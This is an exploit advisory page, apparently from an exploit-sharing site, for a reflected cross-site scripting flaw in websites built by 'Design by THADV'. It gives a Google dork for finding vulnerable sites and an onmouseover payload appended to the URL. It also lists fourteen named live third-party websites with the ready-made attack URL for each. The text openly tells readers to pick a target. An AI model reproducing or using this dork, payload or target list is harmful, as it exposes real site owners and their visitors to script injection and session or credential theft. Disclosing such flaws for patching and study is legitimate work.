Design by THADV Cross Site Scripting

2016.01.25
Credit: Ashiyane Digital Security Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: intext:"Design by THADV" inurl:mobile/index.php

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |----------------------In The Name Of God------------------------| |[+] Exploit Title: Design by THADV Cross Site Scripting |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor Homepage: http://thadv.com/ |[+] |[+] Google Dork: intext:"Design by THADV" inurl:mobile/index.php |[+] |[+] Tested on: Win 10 / Mozilla Firefox |[+] |[+] Date: 2016 23 January |[+] |--------------------------------------------------------------| |[+] Exploit: |[+] Search dork, choose a target then add "%F6%22%20onmouseover=prompt%28992148%29%20//" after URL! |[+] Now, by crossing mouse on a link in page you can see the alert. |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://www.117.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://www.hwananfoods.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://www.chwm3d.com/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://oiltea.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://meishu.com.tw/wap/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://www.baotian.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://www.jhc888.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://chyu2.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://www.summerland.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://www.similar.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://hicar.imobi.tw/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://www.thadv.com/advmobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://www.udc.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |[+] http://yghoist.com/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20// |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : modiret |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top